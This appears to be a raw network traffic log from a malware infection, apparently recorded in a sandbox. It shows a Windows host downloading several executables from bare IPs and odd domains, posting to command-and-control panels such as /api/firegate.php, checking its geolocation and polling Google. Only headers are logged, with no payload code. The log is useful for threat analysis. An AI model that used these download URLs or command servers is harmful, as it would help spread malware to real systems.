HTTP/1.1 200 OK Content-Length: 526848 Content-Type: application/octet-stream Last-Modified: Tue, 18 Jul 2023 08:56:29 GMT Accept-Ranges: bytes ETag: "267937be55b9d91:0" Server: Microsoft-IIS/10.0 Date: Tue, 18 Jul 2023 08:59:01 GMT

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.120.88.198 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:03 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 18 Jul 2023 00:45:02 GMT ETag: "55000-600b839b1bfd9" Accept-Ranges: bytes Content-Length: 348160 Content-Type: application/x-msdos-program

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Tue, 18 Jul 2023 01:59:03 GMT Date: Tue, 18 Jul 2023 00:59:03 GMT Connection: keep-alive

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 87.120.88.198 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:03 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 18 Jul 2023 00:45:02 GMT ETag: "55000-600b839b1bfd9" Accept-Ranges: bytes Content-Length: 348160 Content-Type: application/x-msdos-program

GET /info/photo540.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.40 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 18 Jul 2023 08:56:29 GMT Accept-Ranges: bytes ETag: "267937be55b9d91:0" Server: Microsoft-IIS/10.0 Date: Tue, 18 Jul 2023 08:59:02 GMT Content-Length: 526848

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 18 Jul 2023 00:59:04 GMT Content-Type: application/octet-stream Content-Length: 248320 Last-Modified: Tue, 18 Jul 2023 00:30:02 GMT Connection: keep-alive ETag: "64b5dd0a-3ca00" Accept-Ranges: bytes

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 18 Jul 2023 00:59:04 GMT Content-Type: application/octet-stream Content-Length: 732672 Last-Modified: Mon, 17 Jul 2023 15:18:37 GMT Connection: keep-alive ETag: "64b55bcd-b2e00" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 18 Jul 2023 00:59:04 GMT Content-Type: application/octet-stream Content-Length: 732672 Last-Modified: Mon, 17 Jul 2023 15:18:37 GMT Connection: keep-alive ETag: "64b55bcd-b2e00" Accept-Ranges: bytes

GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 18 Jul 2023 00:59:04 GMT Content-Type: application/octet-stream Content-Length: 248320 Last-Modified: Tue, 18 Jul 2023 00:30:02 GMT Connection: keep-alive ETag: "64b5dd0a-3ca00" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:04 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="wk7ocswq.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 541 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:48 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /sts/imagc.jpg HTTP/1.1 User-Agent: HTTPREAD Host: us.imgjeoigaa.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 18 Jul 2023 00:59:48 GMT Content-Type: image/jpeg Content-Length: 1506508 Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT Connection: keep-alive ETag: "649b9ca8-16fccc" Accept-Ranges: bytes

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:49 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 00:59:50 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /check/safe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jul 2023 00:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /check/?sid=298022&key=b4f42524f642c0e49e544b134b89766b HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Content-Length: 160 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Tue, 18 Jul 2023 00:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Tue, 18 Jul 2023 00:59:52 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Tue, 18 Jul 2023 01:59:52 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7e86c8d73c7ac18a-ICN

POST /home/love/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.3 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9GG5e9Wa6BzIhDICOmAYDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2319 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVGVnauQ3OdeFYyfI1d566YYYrXyiHxSqidt42_Ax4wh2BRnuTNjag; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=DnGEVvZ3bUXer9iZ7IZuQ350INwDJsJLgeul7IP5zp6a-WjeKmXnZDJ-V9yedykH0u1_sbtULquKgUfj5U3USb7VQNtbydRXadq2SP1bX5FDPNSkHzEy0JlXdpTzv2lUh6B1nYg-q2sWhgbGq_cH2W0BNFJU8Gtjf_yc8o-TUsM; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_bMOt8j6gQmJmUry_CM9fA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2316 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVEqvvF6cfBpA6LbXJx_Llq4Ag3uh_ooQeZ95KNVzTMSznjJJhOxrIk; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=IwxQ7gKI7YlfNJ5MiaHwQ56ASiqLa4tNeZVerRoe9P6SJzGAuuUg2zhoMCVuno7dJ19bgRHIWaRNUDJC46dUuvRhhRLCq_jSpJcaSgvBIHn_R6M8w7FR4i9plmFC7HQDF5KxaGVWR-uABB2BZr-3N3pn00LTy_RMuX5aYl1A69c; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-3SMFyw7OfqDqr8SgYr3rXw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVEynpwT4w86bESbPDfu2IQqyMuETy8iMH_SKBqe2QyjHPvpJyk2E5c; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=jIbDP_SvBVemBVqwsqDW1-aUj3EifxHI2oVFlfBb1rH0TESya-f93UoeU0lu5-USITFnhxxmCpVfe-FsP8J-9jtAg-yg_ulRi4d1gjzwZ2Xf6MpUQqLHnavmuGLMPEe87gfOdt2WXttn7T7vJDGM-ePW8ak7xwY5I_NmNcDAbq4; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-SeLpRyEKjuUH_ykyBseYqA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2316 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFZ8PIvV6DqG9EumlNfd03ITeJZmeQVEpcbldFgmjc139TkyVbZM5Q; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=DhMrm29kCVMeY5Yz5BqGwdcTCEVrWtKrGUwmWm6R3Rdtf0nuHE5Ztag7DhE6JxFeum7dFF2R7w3YCE8MPsxEqd6MRr0-nAF-B_PT_3a4elT77P57gZGHAaqecj7t-qyZs6_vcU1ga8_Q5nZ2kGKD__PwTRT2rGFZY5wSMF_8EsY; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:19 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-NruYBgBjTulzmbHcFlRhhA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2317 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVFO5dL3cvUuB65zIVthldpap2gVsEs1ZloCpzTwUzuaThjuCKTzVQ; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=untc_i20XJHjcEfgx7I3VavT5wyCbuWIZQP5iXphlIq8cWOT0jz2bp0L3k-WEJS_WdyqNXCyH3r3Dk1BLGzx897jb6qXquWIktajRZHCBmgZQbJBVs-B_ImBn20tMrg_36haGCLLpdYVhzBFIGN9XT-c9z3D3GJbhlqNnGL2wAY; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:20 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7281NS21KbGtZq96VpWreQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2322 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:20 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVG66hb8LRkFAP4jR5iKEWVFytrizsJsA66cabYCzJhA3wi4jD2Z5g; expires=Sun, 14-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=i8yKBzvKsWQplpi_-2-zmAwmbpU8_z_7J9wmoBxsTcFBq8Nx4yVkNa_UxH8fwY4FUNTL0wi1mkJa1_XHvFdCWITcTXNbGpIXXif4v_JXlzzLuYnTPGBTiRPZOL5cOjXu4z4XUV1boH3jt4joVuT1BfktjLGa0MN-FV3PXZC9V4A; expires=Wed, 17-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 18 Jul 2023 01:00:20 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-J8TIv_nMzNN_CeSta0T9ug' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2320 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:20 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ad49MVEnp6ZTn5rYBhOCWRD9Q7PDYc5ihjCuq_6s3fJxTspKYznO12qTstM; expires=Sun, 14-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=UrsMJ_yx-alXK2kTx-DaPSFd6UIbaBXwLJV8M0rX1O43531PiJrDokN4kPulLMzr6rThSX4oQv8SXN-TcfEoNuU7NS4KkRP_mcCF2HKe-m3nSlDt4EidCLKCnDZv9VVkYfNYroVdUzo3sCk0FzXdqGuYLB5WG7_Ajb-IrIs6uek; expires=Wed, 17-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; HttpOnly